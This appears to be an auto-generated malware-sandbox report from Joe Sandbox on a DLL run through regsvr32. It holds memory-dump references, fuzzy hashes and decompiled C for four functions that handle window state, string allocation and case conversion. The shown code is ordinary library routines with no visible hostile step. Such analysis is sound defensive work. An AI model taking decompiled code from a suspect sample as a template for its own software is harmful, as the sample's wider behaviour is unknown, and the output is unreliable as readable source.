                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateLongRectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 74886174-0
                                                                                                                • Opcode ID: 827346ad1f91414aa146f463bbb10db327099f6c7691194f7244797a1acd95c3
                                                                                                                • Instruction ID: d30088e821e30678c8b610df5a77cc83cd6e6cd6692d123265b1387941753b0c
                                                                                                                • Opcode Fuzzy Hash: 827346ad1f91414aa146f463bbb10db327099f6c7691194f7244797a1acd95c3
                                                                                                                • Instruction Fuzzy Hash: A6415C34640248BFEB11DB64CC96FEEBBB5FF08B50F104568FA556A2D1C7B1A940CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003A866 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1003A866(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x100b9e70; // 0xbb35530
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E10049170(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E100203AA(_t74, 0x1009ee08);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E100203AA(_t74, 0x10099fa4);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E1001FA58(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E1001FA58(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000B9D2(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000B9D2(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000B9D2(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000B9D2(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1001E302(0, _t98, _t101, _t114) + 0x10)));
					_t52 = L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000B9D2(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1001E302(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = L100013E3( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1004763E(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}






















                                                                                                                0x1003a866
                                                                                                                0x1003a867
                                                                                                                0x1003a874
                                                                                                                0x1003a87b
                                                                                                                0x1003a882
                                                                                                                0x1003a889
                                                                                                                0x1003a88f
                                                                                                                0x1003a895
                                                                                                                0x1003a8a7
                                                                                                                0x1003a8aa
                                                                                                                0x1003a8b1
                                                                                                                0x1003a8b7
                                                                                                                0x1003a921
                                                                                                                0x1003a923
                                                                                                                0x1003a928
                                                                                                                0x1003a92a
                                                                                                                0x1003a932
                                                                                                                0x1003a933
                                                                                                                0x1003a946
                                                                                                                0x1003a94b
                                                                                                                0x1003a950
                                                                                                                0x1003a935
                                                                                                                0x1003a935
                                                                                                                0x1003a93a
                                                                                                                0x1003a93f
                                                                                                                0x1003a93f
                                                                                                                0x1003a8b9
                                                                                                                0x1003a8bc
                                                                                                                0x1003a8c3
                                                                                                                0x1003a8c9
                                                                                                                0x1003a8cf
                                                                                                                0x1003a8d2
                                                                                                                0x1003a8d5
                                                                                                                0x1003a8d9
                                                                                                                0x1003a8ee
                                                                                                                0x1003a8f1
                                                                                                                0x1003a8f1
                                                                                                                0x1003a8f6
                                                                                                                0x1003a8f9
                                                                                                                0x1003a8fd
                                                                                                                0x1003a912
                                                                                                                0x1003a915
                                                                                                                0x1003a915
                                                                                                                0x1003a8fd
                                                                                                                0x1003a96a
                                                                                                                0x1003a96d
                                                                                                                0x1003a974
                                                                                                                0x1003a977
                                                                                                                0x1003a993
                                                                                                                0x1003a996
                                                                                                                0x1003a996
                                                                                                                0x1003a99e
                                                                                                                0x1003a9a0
                                                                                                                0x1003a9a3
                                                                                                                0x1003a9c2
                                                                                                                0x1003a9c5
                                                                                                                0x1003a9c5
                                                                                                                0x1003a9a3
                                                                                                                0x1003a9d0
                                                                                                                0x1003a9d1
                                                                                                                0x1003a9d4
                                                                                                                0x1003a9e1

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1003A895
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A8E6
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A90A
                                                                                                                  • Part of subcall function 1000B9D2: __EH_prolog3.LIBCMT ref: 1000B9D9
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A962
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A98B
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1003A9BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$H_prolog3_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 842698744-0
                                                                                                                • Opcode ID: 6d8f488ef925847840e43afd7d83c594b72d848409058837a7515ba358218f19
                                                                                                                • Instruction ID: dfef55ded7a008922d057449d15f10d95a2a40bb4d43d9ca1603c11ce763908f
                                                                                                                • Opcode Fuzzy Hash: 6d8f488ef925847840e43afd7d83c594b72d848409058837a7515ba358218f19
                                                                                                                • Instruction Fuzzy Hash: DD416834900605CFDB21DFB8C881A9DB7B4FF05310F10852EE5AAAB2A2DB74A954CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B3BD Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E1001B3BD(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x100b9e70; // 0xbb35530
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1001B2DE(0);
				_t67 = _t72;
				_t63 = E1001B312(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E10012602(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1001B2DE(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1004763E(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}
























                                                                                                                0x1001b3bd
                                                                                                                0x1001b3be
                                                                                                                0x1001b3cb
                                                                                                                0x1001b3d2
                                                                                                                0x1001b3e1
                                                                                                                0x1001b3e7
                                                                                                                0x1001b3ea
                                                                                                                0x1001b3ed
                                                                                                                0x1001b3f2
                                                                                                                0x1001b3fd
                                                                                                                0x1001b402
                                                                                                                0x1001b405
                                                                                                                0x1001b40a
                                                                                                                0x1001b40a
                                                                                                                0x1001b410
                                                                                                                0x1001b418
                                                                                                                0x1001b420
                                                                                                                0x1001b445
                                                                                                                0x1001b445
                                                                                                                0x1001b447
                                                                                                                0x1001b449
                                                                                                                0x1001b449
                                                                                                                0x00000000
                                                                                                                0x1001b42d
                                                                                                                0x1001b437
                                                                                                                0x1001b43f
                                                                                                                0x00000000
                                                                                                                0x1001b441
                                                                                                                0x1001b441
                                                                                                                0x1001b44c
                                                                                                                0x1001b44c
                                                                                                                0x1001b452
                                                                                                                0x1001b456
                                                                                                                0x1001b459
                                                                                                                0x1001b461
                                                                                                                0x1001b468
                                                                                                                0x1001b468
                                                                                                                0x1001b461
                                                                                                                0x1001b471
                                                                                                                0x1001b479
                                                                                                                0x1001b47f
                                                                                                                0x1001b492
                                                                                                                0x1001b492
                                                                                                                0x1001b492
                                                                                                                0x1001b481
                                                                                                                0x1001b487
                                                                                                                0x1001b489
                                                                                                                0x1001b489
                                                                                                                0x1001b487
                                                                                                                0x1001b47f
                                                                                                                0x1001b499
                                                                                                                0x1001b49b
                                                                                                                0x1001b49f
                                                                                                                0x1001b4a6
                                                                                                                0x1001b4a9
                                                                                                                0x1001b4ba
                                                                                                                0x1001b4bc
                                                                                                                0x1001b4be
                                                                                                                0x1001b4be
                                                                                                                0x1001b4a1
                                                                                                                0x1001b4a1
                                                                                                                0x1001b4a1
                                                                                                                0x1001b4c5
                                                                                                                0x1001b4cb
                                                                                                                0x1001b4cc
                                                                                                                0x1001b4cf
                                                                                                                0x1001b4dc
                                                                                                                0x1001b4de
                                                                                                                0x1001b4e3
                                                                                                                0x1001b4e3
                                                                                                                0x1001b4e9
                                                                                                                0x1001b4f0
                                                                                                                0x1001b4f0
                                                                                                                0x1001b4f8
                                                                                                                0x1001b506
                                                                                                                0x1001b507
                                                                                                                0x1001b50a
                                                                                                                0x1001b517
                                                                                                                0x1001b517
                                                                                                                0x1001b43f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001B312: GetParent.USER32(?), ref: 1001B365
                                                                                                                  • Part of subcall function 1001B312: GetLastActivePopup.USER32(?), ref: 1001B374
                                                                                                                  • Part of subcall function 1001B312: IsWindowEnabled.USER32(?), ref: 1001B389
                                                                                                                  • Part of subcall function 1001B312: EnableWindow.USER32(?,00000000), ref: 1001B39C
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001B40A
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 1001B418
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?), ref: 1001B422
                                                                                                                • SendMessageA.USER32 ref: 1001B437
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 1001B4B4
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001B4F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1877664794-0
                                                                                                                • Opcode ID: 31a5804d88825593c8e5a19e73390321cc22ec94f356a1a5629cb7ca7f31cdb2
                                                                                                                • Instruction ID: af1b9d0b361e8316da3ec2ee59257911741e438ffdcaf767e901d315e256d08a
                                                                                                                • Opcode Fuzzy Hash: 31a5804d88825593c8e5a19e73390321cc22ec94f356a1a5629cb7ca7f31cdb2
                                                                                                                • Instruction Fuzzy Hash: E0418D72A00A589FEB30CFB5CC85BDE7BA8EF05750F218119E9599B282DB70D9848F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100010EB Relevance: 9.1, APIs: 6, Instructions: 107stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E100010EB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t26;
				void* _t36;
				void* _t37;
				void* _t44;
				void* _t45;
				WCHAR* _t62;
				intOrPtr _t63;
				CHAR* _t65;
				intOrPtr _t66;
				void* _t67;
				void* _t68;

				_t60 = __edx;
				_push(0x10);
				E100476B6(0x1008d7bb, __ebx, __edi, __esi);
				_t62 =  *(_t67 + 8);
				_t65 = 0;
				if((0 | _t62 != 0x00000000) == 0) {
					_push(0x80004005);
					L10001401(__ebx, __ecx, __edx, _t62, 0, _t67);
				}
				 *((intOrPtr*)(_t67 - 0x1c)) =  *0x100bb480();
				 *(_t67 - 0x18) = _t65;
				 *(_t67 - 4) = _t65;
				if(_t62 != _t65) {
					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenW(_t62) + 1;
					_t44 = L10001357(_t67 - 0x14, lstrlenW(_t62) + 1, 2);
					_t68 = _t68 + 0xc;
					if(_t44 >= 0) {
						_t66 =  *((intOrPtr*)(_t67 - 0x14));
						_t76 = _t66 - 0x400;
						if(_t66 > 0x400) {
							L8:
							_t45 = L100012BC(0x400, _t67 - 0x18, _t60, _t62, __eflags, _t66);
						} else {
							_push(_t66);
							if(L10001492(0x400, _t60, _t62, _t66, _t76) == 0) {
								goto L8;
							} else {
								E10048380(_t66);
								_t45 = _t68;
							}
						}
						_t65 = L100010B4(_t45, _t62, _t66,  *((intOrPtr*)(_t67 - 0x1c)));
					}
				}
				CharLowerA(_t65);
				if(_t65 == 0) {
					L12:
					_t26 = 0;
				} else {
					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenA(_t65) + 1;
					_t36 = L10001357(_t67 - 0x14, lstrlenA(_t65) + 1, 2);
					_t68 = _t68 + 0xc;
					if(_t36 >= 0) {
						_t63 =  *((intOrPtr*)(_t67 - 0x14));
						__eflags = _t63 - 0x400;
						if(__eflags > 0) {
							L16:
							_t37 = L100012BC(0x400, _t67 - 0x18, _t60, _t63, __eflags, _t63);
						} else {
							_push(_t63);
							__eflags = L10001492(0x400, _t60, _t63, _t65, __eflags);
							if(__eflags == 0) {
								goto L16;
							} else {
								E10048380(_t63);
								_t37 = _t68;
							}
						}
						_t26 = L10001398(_t37, _t65, _t63,  *((intOrPtr*)(_t67 - 0x1c)));
						_t62 =  *(_t67 + 8);
					} else {
						goto L12;
					}
				}
				L10001389(L1000146A(0x400, _t60, _t62, _t65, _t67, _t62, E100483AC(_t62) + 1, _t26), _t67 - 0x18);
				return E10047739(0x400, _t62, _t65);
			}














                                                                                                                0x100010eb
                                                                                                                0x10002663
                                                                                                                0x1000266a
                                                                                                                0x1000266f
                                                                                                                0x10002674
                                                                                                                0x1000267d
                                                                                                                0x1000267f
                                                                                                                0x10002684
                                                                                                                0x10002684
                                                                                                                0x1000268f
                                                                                                                0x10002692
                                                                                                                0x10002697
                                                                                                                0x1000269f
                                                                                                                0x100026ac
                                                                                                                0x100026b3
                                                                                                                0x100026b8
                                                                                                                0x100026bd
                                                                                                                0x100026bf
                                                                                                                0x100026c2
                                                                                                                0x100026c4
                                                                                                                0x100026dc
                                                                                                                0x100026e0
                                                                                                                0x100026c6
                                                                                                                0x100026c6
                                                                                                                0x100026cf
                                                                                                                0x00000000
                                                                                                                0x100026d1
                                                                                                                0x100026d3
                                                                                                                0x100026d8
                                                                                                                0x100026d8
                                                                                                                0x100026cf
                                                                                                                0x100026f0
                                                                                                                0x100026f0
                                                                                                                0x100026bd
                                                                                                                0x100026f3
                                                                                                                0x100026fb
                                                                                                                0x1000271b
                                                                                                                0x1000271b
                                                                                                                0x100026fd
                                                                                                                0x10002708
                                                                                                                0x1000270f
                                                                                                                0x10002714
                                                                                                                0x10002719
                                                                                                                0x1000271f
                                                                                                                0x10002722
                                                                                                                0x10002724
                                                                                                                0x1000273c
                                                                                                                0x10002740
                                                                                                                0x10002726
                                                                                                                0x10002726
                                                                                                                0x1000272c
                                                                                                                0x1000272f
                                                                                                                0x00000000
                                                                                                                0x10002731
                                                                                                                0x10002733
                                                                                                                0x10002738
                                                                                                                0x10002738
                                                                                                                0x1000272f
                                                                                                                0x1000274b
                                                                                                                0x10002750
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10002719
                                                                                                                0x10002769
                                                                                                                0x10002778

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$CharH_prolog3_Lower
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116776509-0
                                                                                                                • Opcode ID: 5a022c767afc5c677e1437f3c1c43d33b4a290dcb827912ab606d17bf4cce7f0
                                                                                                                • Instruction ID: 9d19a7622eb91d1bd22a87b9170e79a4f7ecf615831e20b68bd4b81b2f6b7c65
                                                                                                                • Opcode Fuzzy Hash: 5a022c767afc5c677e1437f3c1c43d33b4a290dcb827912ab606d17bf4cce7f0
                                                                                                                • Instruction Fuzzy Hash: E031E27AD00125ABEB01EBA48C86AFF3768EF41780F110025FE05F714AEA346E42C7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001474 Relevance: 9.1, APIs: 6, Instructions: 107stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E10001474(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t26;
				void* _t36;
				void* _t37;
				void* _t44;
				void* _t45;
				WCHAR* _t62;
				intOrPtr _t63;
				CHAR* _t65;
				intOrPtr _t66;
				void* _t67;
				void* _t68;

				_t60 = __edx;
				_push(0x10);
				E100476B6(0x1008d7f3, __ebx, __edi, __esi);
				_t62 =  *(_t67 + 8);
				_t65 = 0;
				if((0 | _t62 != 0x00000000) == 0) {
					_push(0x80004005);
					L10001401(__ebx, __ecx, __edx, _t62, 0, _t67);
				}
				 *((intOrPtr*)(_t67 - 0x1c)) =  *0x100bb480();
				 *(_t67 - 0x18) = _t65;
				 *(_t67 - 4) = _t65;
				if(_t62 != _t65) {
					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenW(_t62) + 1;
					_t44 = L10001357(_t67 - 0x14, lstrlenW(_t62) + 1, 2);
					_t68 = _t68 + 0xc;
					if(_t44 >= 0) {
						_t66 =  *((intOrPtr*)(_t67 - 0x14));
						_t76 = _t66 - 0x400;
						if(_t66 > 0x400) {
							L8:
							_t45 = L100012BC(0x400, _t67 - 0x18, _t60, _t62, __eflags, _t66);
						} else {
							_push(_t66);
							if(L10001492(0x400, _t60, _t62, _t66, _t76) == 0) {
								goto L8;
							} else {
								E10048380(_t66);
								_t45 = _t68;
							}
						}
						_t65 = L100010B4(_t45, _t62, _t66,  *((intOrPtr*)(_t67 - 0x1c)));
					}
				}
				CharUpperA(_t65);
				if(_t65 == 0) {
					L12:
					_t26 = 0;
				} else {
					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenA(_t65) + 1;
					_t36 = L10001357(_t67 - 0x14, lstrlenA(_t65) + 1, 2);
					_t68 = _t68 + 0xc;
					if(_t36 >= 0) {
						_t63 =  *((intOrPtr*)(_t67 - 0x14));
						__eflags = _t63 - 0x400;
						if(__eflags > 0) {
							L16:
							_t37 = L100012BC(0x400, _t67 - 0x18, _t60, _t63, __eflags, _t63);
						} else {
							_push(_t63);
							__eflags = L10001492(0x400, _t60, _t63, _t65, __eflags);
							if(__eflags == 0) {
								goto L16;
							} else {
								E10048380(_t63);
								_t37 = _t68;
							}
						}
						_t26 = L10001398(_t37, _t65, _t63,  *((intOrPtr*)(_t67 - 0x1c)));
						_t62 =  *(_t67 + 8);
					} else {
						goto L12;
					}
				}
				L10001389(L1000146A(0x400, _t60, _t62, _t65, _t67, _t62, E100483AC(_t62) + 1, _t26), _t67 - 0x18);
				return E10047739(0x400, _t62, _t65);
			}














                                                                                                                0x10001474
                                                                                                                0x100027e6
                                                                                                                0x100027ed
                                                                                                                0x100027f2
                                                                                                                0x100027f7
                                                                                                                0x10002800
                                                                                                                0x10002802
                                                                                                                0x10002807
                                                                                                                0x10002807
                                                                                                                0x10002812
                                                                                                                0x10002815
                                                                                                                0x1000281a
                                                                                                                0x10002822
                                                                                                                0x1000282f
                                                                                                                0x10002836
                                                                                                                0x1000283b
                                                                                                                0x10002840
                                                                                                                0x10002842
                                                                                                                0x10002845
                                                                                                                0x10002847
                                                                                                                0x1000285f
                                                                                                                0x10002863
                                                                                                                0x10002849
                                                                                                                0x10002849
                                                                                                                0x10002852
                                                                                                                0x00000000
                                                                                                                0x10002854
                                                                                                                0x10002856
                                                                                                                0x1000285b
                                                                                                                0x1000285b
                                                                                                                0x10002852
                                                                                                                0x10002873
                                                                                                                0x10002873
                                                                                                                0x10002840
                                                                                                                0x10002876
                                                                                                                0x1000287e
                                                                                                                0x1000289e
